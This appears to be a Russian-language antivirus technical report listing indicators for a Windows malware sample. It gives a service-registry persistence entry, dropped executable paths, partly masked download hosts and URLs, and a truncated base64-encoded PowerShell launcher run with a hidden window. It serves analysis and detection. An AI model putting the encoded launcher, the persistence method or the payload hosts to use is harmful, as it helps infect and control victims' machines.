Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\RmClient] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\RmClient] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDINUK2\RmClient.exe"'
- 'RmClient' "%WINDIR%\SysWOW64\KBDINUK2\RmClient.exe"
- 'RmClient' %WINDIR%\SysWOW64\KBDINUK2\RmClient.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABUAHEAegB5ADMANQB0AD0AWwBjAGgAYQByAF0ANAAyADsAJABIAHUAdAAwAG8AcQA1AD0AKAAnAFQAJwArACgAJwBxADgAMwBhACcAKwAnAGIAJwApACsAJwBoACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQ...
- %HOMEPATH%\jfckvks\ovgqw1h\sg46p88fo.exe
- %WINDIR%\syswow64\kbdinuk2\rmclient.exe
- %HOMEPATH%\jfckvks\ovgqw1h\sg46p88fo.exe в %WINDIR%\syswow64\kbdinuk2\rmclient.exe
- '17#.#3.7.151':80
- http://wy##838.com/wp-content/ZhG/
- http://17#.#3.7.151/NSILH/QYkSDNISYK9sSnn3w5/AnIGsTrp2ecYDTw633/Ik9diNqc6Qcub/
- DNS ASK wy##838.com
- '%HOMEPATH%\jfckvks\ovgqw1h\sg46p88fo.exe'
- '%WINDIR%\syswow64\kbdinuk2\rmclient.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABUAHEAegB5ADMANQB0AD0AWwBjAGgAYQByAF0ANAAyADsAJABIAHUAdAAwAG8AcQA1AD0AKAAnAFQAJwArACgAJwBxADgAMwBhACcAKwAnAGIAJwApACsAJwBoACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQ...' (со скрытым окном)